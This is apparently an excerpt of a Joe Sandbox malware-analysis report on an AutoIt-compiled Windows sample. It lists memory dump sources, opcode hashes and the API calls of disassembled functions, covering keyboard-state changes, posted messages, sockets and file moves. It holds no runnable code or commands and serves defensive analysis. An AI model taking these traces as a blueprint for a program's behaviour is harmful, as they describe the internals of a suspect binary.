                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                • API String ID: 0-572801152
                                                                • Opcode ID: e3121fa54ff457386abcacb03c317adf40e0a491a9ec5eb38a005e2353d053be
                                                                • Instruction ID: 091218591e2498ce87cb8a9748c28ffec8dca6af14bfd5fd8502ea3b2c01d1c4
                                                                • Opcode Fuzzy Hash: e3121fa54ff457386abcacb03c317adf40e0a491a9ec5eb38a005e2353d053be
                                                                • Instruction Fuzzy Hash: 35D1E471A0061AAFDF11CFA8E885BAEB7B5FF48344F148169E915AB281E374DD41CB90
                                                                APIs
                                                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,007517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 007515CE
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00751651
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,007517FB,?,007517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007516E4
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007516FB
                                                                  • Part of subcall function 00743820: RtlAllocateHeap.NTDLL(00000000,?,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6,?,00711129), ref: 00743852
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,007517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00751777
                                                                • __freea.LIBCMT ref: 007517A2
                                                                • __freea.LIBCMT ref: 007517AE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                • String ID:
                                                                • API String ID: 2829977744-0
                                                                • Opcode ID: 7f04e7bfc9461c7b176e496d607b810a75c5d89ebd97454612885a6fdc0bd8c3
                                                                • Instruction ID: e3bcdbfa30defbe245a3376009d1589fad420cbb2a65c49ef194ce2465f74dd1
                                                                • Opcode Fuzzy Hash: 7f04e7bfc9461c7b176e496d607b810a75c5d89ebd97454612885a6fdc0bd8c3
                                                                • Instruction Fuzzy Hash: 6B91D571E002169ADB208E78C885BEE7BB5DF49313F984659EC01E7141EBBDCD48C760
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit
                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                • API String ID: 2610073882-625585964
                                                                • Opcode ID: bbed661c169e8396d1582b6d0ffba5c911603569240083370332315b2fff532d
                                                                • Instruction ID: 57da5829f894b22822e49af9a33af9ff3f90da0972e4413065a4073307675847
                                                                • Opcode Fuzzy Hash: bbed661c169e8396d1582b6d0ffba5c911603569240083370332315b2fff532d
                                                                • Instruction Fuzzy Hash: 12919471A00219EBDF24CFA4DC48FAE7BB8EF46714F108559F505AB280D7789942CFA0
                                                                APIs
                                                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0078125C
                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00781284
                                                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007812A8
                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007812D8
                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0078135F
                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007813C4
                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00781430
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                • String ID:
                                                                • API String ID: 2550207440-0
                                                                • Opcode ID: 68761571e62faa0e929e591d00ff3d2b1fcd906f192097b1c3b72246cebb4f22
                                                                • Instruction ID: c58f0240b76f4c088f7d9e479dd4be0860ab5a4fb8985a9a9b5c25ed038da7d4
                                                                • Opcode Fuzzy Hash: 68761571e62faa0e929e591d00ff3d2b1fcd906f192097b1c3b72246cebb4f22
                                                                • Instruction Fuzzy Hash: 5591D471A40218EFDB01EF98C888BBE77B9FF45325F504029E905E7291D77CA946CB94
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                • String ID:
                                                                • API String ID: 3225163088-0
                                                                • Opcode ID: 5e263921f4defef66cafa9e19f203cefb1f42a99350fcf2e3ffa308719413d2b
                                                                • Instruction ID: 1db8bfb72d5145652abec93baf0134b1f96d1a98a68990e29a41a9bfac568acd
                                                                • Opcode Fuzzy Hash: 5e263921f4defef66cafa9e19f203cefb1f42a99350fcf2e3ffa308719413d2b
                                                                • Instruction Fuzzy Hash: 75915C71E00219EFCB15CFA9DC84AEEBBB8FF49320F148055E915B7291D378A951CB60
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 0079396B
                                                                • CharUpperBuffW.USER32(?,?), ref: 00793A7A
                                                                • _wcslen.LIBCMT ref: 00793A8A
                                                                • VariantClear.OLEAUT32(?), ref: 00793C1F
                                                                  • Part of subcall function 00780CDF: VariantInit.OLEAUT32(00000000), ref: 00780D1F
                                                                  • Part of subcall function 00780CDF: VariantCopy.OLEAUT32(?,?), ref: 00780D28
                                                                  • Part of subcall function 00780CDF: VariantClear.OLEAUT32(?), ref: 00780D34
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                • API String ID: 4137639002-1221869570
                                                                • Opcode ID: 2258d3928beb7d6350e2563c79eebb989b527776ed82de6830bd701f53d7f29f
                                                                • Instruction ID: 486d14978b32bb3dc3e34b91c8cb593a2fd92ca05da94d29e879775daeea1db3
                                                                • Opcode Fuzzy Hash: 2258d3928beb7d6350e2563c79eebb989b527776ed82de6830bd701f53d7f29f
                                                                • Instruction Fuzzy Hash: 249144756083059FCB04EF28D48596AB7E5FF89314F14882DF8899B351DB38EE45CB92
                                                                APIs
                                                                  • Part of subcall function 0077000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?,?,0077035E), ref: 0077002B
                                                                  • Part of subcall function 0077000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?), ref: 00770046
                                                                  • Part of subcall function 0077000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?), ref: 00770054
                                                                  • Part of subcall function 0077000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?), ref: 00770064
                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00794C51
                                                                • _wcslen.LIBCMT ref: 00794D59
                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00794DCF
                                                                • CoTaskMemFree.OLE32(?), ref: 00794DDA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                • String ID: NULL Pointer assignment
                                                                • API String ID: 614568839-2785691316
                                                                • Opcode ID: c4465fa0171a2ca5f26711f2dd830170346cf0ee0ebbecacebba3ac32d36c97f
                                                                • Instruction ID: a826c8bec5a95e51e26e92f8b7ef1400dbebae25387448eafb4f7f08564c63f1
                                                                • Opcode Fuzzy Hash: c4465fa0171a2ca5f26711f2dd830170346cf0ee0ebbecacebba3ac32d36c97f
                                                                • Instruction Fuzzy Hash: 7F911771D00219EFDF15DFA4D895EEEB7B8BF08310F108169E919A7291DB389A45CFA0
                                                                APIs
                                                                • GetMenu.USER32(?), ref: 007A2183
                                                                • GetMenuItemCount.USER32(00000000), ref: 007A21B5
                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007A21DD
                                                                • _wcslen.LIBCMT ref: 007A2213
                                                                • GetMenuItemID.USER32(?,?), ref: 007A224D
                                                                • GetSubMenu.USER32(?,?), ref: 007A225B
                                                                  • Part of subcall function 00773A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00773A57
                                                                  • Part of subcall function 00773A3D: GetCurrentThreadId.KERNEL32 ref: 00773A5E
                                                                  • Part of subcall function 00773A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007725B3), ref: 00773A65
                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007A22E3
                                                                  • Part of subcall function 0077E97B: Sleep.KERNEL32 ref: 0077E9F3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                • String ID:
                                                                • API String ID: 4196846111-0
                                                                • Opcode ID: a84bd8c0bb814eb812a0013fa517fbfa7aa05676edeae69c82255f4f62a3752d
                                                                • Instruction ID: 5f496f74baad75f0e164df5f4c66a4e0a5cd03224669a34c737b03a01ffbc9f8
                                                                • Opcode Fuzzy Hash: a84bd8c0bb814eb812a0013fa517fbfa7aa05676edeae69c82255f4f62a3752d
                                                                • Instruction Fuzzy Hash: C1718135A00205EFCB15DF68C845AAEB7F5FF89310F158559E816EB392DB38ED428B90
                                                                APIs
                                                                • GetParent.USER32(?), ref: 0077AEF9
                                                                • GetKeyboardState.USER32(?), ref: 0077AF0E
                                                                • SetKeyboardState.USER32(?), ref: 0077AF6F
                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 0077AF9D
                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0077AFBC
                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 0077AFFD
                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0077B020
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                • String ID:
                                                                • API String ID: 87235514-0
                                                                • Opcode ID: 222692f3ca71d8dbf98498b7378c586ef855c07494137cda8107be305461aac1
                                                                • Instruction ID: f839fcb0f75cd0a06b3deb4fdb94dbffd986f4999fd90ed1407a26f67d0aa1e9
                                                                • Opcode Fuzzy Hash: 222692f3ca71d8dbf98498b7378c586ef855c07494137cda8107be305461aac1
                                                                • Instruction Fuzzy Hash: 7F51C0A06087D53DFF3682348849BBABEA95B46384F08C589E1DD958C2C3DCE888D761
                                                                APIs
                                                                • GetParent.USER32(00000000), ref: 0077AD19
                                                                • GetKeyboardState.USER32(?), ref: 0077AD2E
                                                                • SetKeyboardState.USER32(?), ref: 0077AD8F
                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0077ADBB
                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0077ADD8
                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0077AE17
                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0077AE38
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                • String ID:
                                                                • API String ID: 87235514-0
                                                                • Opcode ID: 0772cbb387c9055a35cae5a5b89b6487cdac92207deeaee35665a6b35020ef3b
                                                                • Instruction ID: ea15915b231fe0a9e65c5539d6a12179a46f456cf7f5996246cb9231d428082b
                                                                • Opcode Fuzzy Hash: 0772cbb387c9055a35cae5a5b89b6487cdac92207deeaee35665a6b35020ef3b
                                                                • Instruction Fuzzy Hash: F051A3A16047D53DFF3783248C56BBE7EA96B86340F08C589E1DD46882D29CAC94D752
                                                                APIs
                                                                • GetConsoleCP.KERNEL32(00753CD6,?,?,?,?,?,?,?,?,00745BA3,?,?,00753CD6,?,?), ref: 00745470
                                                                • __fassign.LIBCMT ref: 007454EB
                                                                • __fassign.LIBCMT ref: 00745506
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00753CD6,00000005,00000000,00000000), ref: 0074552C
                                                                • WriteFile.KERNEL32(?,00753CD6,00000000,00745BA3,00000000,?,?,?,?,?,?,?,?,?,00745BA3,?), ref: 0074554B
                                                                • WriteFile.KERNEL32(?,?,00000001,00745BA3,00000000,?,?,?,?,?,?,?,?,?,00745BA3,?), ref: 00745584
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                • Opcode ID: bf03449d3132c7b7934d3329b0ae1782cad7f96788510cb015565ff195c46e50
                                                                • Instruction ID: 10bf75a695019a5eb57b5524ba20365d7e455ab97ff693bd6fef1dce28cb63fe
                                                                • Opcode Fuzzy Hash: bf03449d3132c7b7934d3329b0ae1782cad7f96788510cb015565ff195c46e50
                                                                • Instruction Fuzzy Hash: 2851E670A00649AFDB11CFA8D885AEEFBFAEF09300F14411AF555E7292E7349A51CB60
                                                                APIs
                                                                  • Part of subcall function 0079304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0079307A
                                                                  • Part of subcall function 0079304E: _wcslen.LIBCMT ref: 0079309B
                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00791112
                                                                • WSAGetLastError.WSOCK32 ref: 00791121
                                                                • WSAGetLastError.WSOCK32 ref: 007911C9
                                                                • closesocket.WSOCK32(00000000), ref: 007911F9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                • String ID:
                                                                • API String ID: 2675159561-0
                                                                • Opcode ID: 32c704fbb015dfe37e782e4ab78e3fa7e23fd2a6ea55ab3f9be9c6800e7d89e0
                                                                • Instruction ID: 443a8aaf88ddbaacbe4aaf25af00f731db032f0474a022cc33d394f72780b2cf
                                                                • Opcode Fuzzy Hash: 32c704fbb015dfe37e782e4ab78e3fa7e23fd2a6ea55ab3f9be9c6800e7d89e0
                                                                • Instruction Fuzzy Hash: B541F431600209FFDB119F58D888BA9BBEAFF85324F148059F9159B291D778ED81CBA1
                                                                APIs
                                                                  • Part of subcall function 0077DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0077CF22,?), ref: 0077DDFD
                                                                  • Part of subcall function 0077DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0077CF22,?), ref: 0077DE16
                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0077CF45
                                                                • MoveFileW.KERNEL32(?,?), ref: 0077CF7F
                                                                • _wcslen.LIBCMT ref: 0077D005
                                                                • _wcslen.LIBCMT ref: 0077D01B
                                                                • SHFileOperationW.SHELL32(?), ref: 0077D061
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                • String ID: \*.*
                                                                • API String ID: 3164238972-1173974218
                                                                • Opcode ID: c71cbe84f2c5e2af5d9777ce7a515aa0e97f0633ebb964575d48d01304e284ae
                                                                • Instruction ID: 0a7a506feae95326bdfbbdbe4bbc846970fe3cccbb7fec4fbae78eac38b043bf
                                                                • Opcode Fuzzy Hash: c71cbe84f2c5e2af5d9777ce7a515aa0e97f0633ebb964575d48d01304e284ae
                                                                • Instruction Fuzzy Hash: F74157729052189EDF17EFA4C985BDDB7B9AF09380F0440E6E509E7142EA38AA44CB50
                                                                APIs
                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007A2E1C
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007A2E4F
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007A2E84
                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007A2EB6
                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007A2EE0
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007A2EF1
                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007A2F0B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: LongWindow$MessageSend
                                                                • String ID:
                                                                • API String ID: 2178440468-0
                                                                • Opcode ID: 23aebe6b5ca12811621ccb2092da6542b400fb75c878d063ddb77841c4a8c8ee
                                                                • Instruction ID: c310c7d8a3e36e395a4c7a68bfb87f3074e547fdeab5bd17e06dd89eb09ee7bd
                                                                • Opcode Fuzzy Hash: 23aebe6b5ca12811621ccb2092da6542b400fb75c878d063ddb77841c4a8c8ee
                                                                • Instruction Fuzzy Hash: 8631F230609290EFEB21CF5CDC89F6537E1EB8A710F1542A4F9008F2B2CB79A881DB45
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00777769
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0077778F
                                                                • SysAllocString.OLEAUT32(00000000), ref: 00777792
                                                                • SysAllocString.OLEAUT32(?), ref: 007777B0
                                                                • SysFreeString.OLEAUT32(?), ref: 007777B9
                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 007777DE
                                                                • SysAllocString.OLEAUT32(?), ref: 007777EC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                • String ID:
                                                                • API String ID: 3761583154-0
                                                                • Opcode ID: 3f3f22f66ee26b01266cf91464cdb0129e502b9bba6fea7bd5c6913e177002c4
                                                                • Instruction ID: 09a9dcb49e9006cf5908129c2e009c96f134ff7a7f7c4ed34da84dff5c16c833
                                                                • Opcode Fuzzy Hash: 3f3f22f66ee26b01266cf91464cdb0129e502b9bba6fea7bd5c6913e177002c4
                                                                • Instruction Fuzzy Hash: 97219C76604219BFDF199FA8DC89CBB77ACEB093A4700C025FA08DB150D6789C41C7A8
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00777842
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00777868
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0077786B
                                                                • SysAllocString.OLEAUT32 ref: 0077788C
                                                                • SysFreeString.OLEAUT32 ref: 00777895
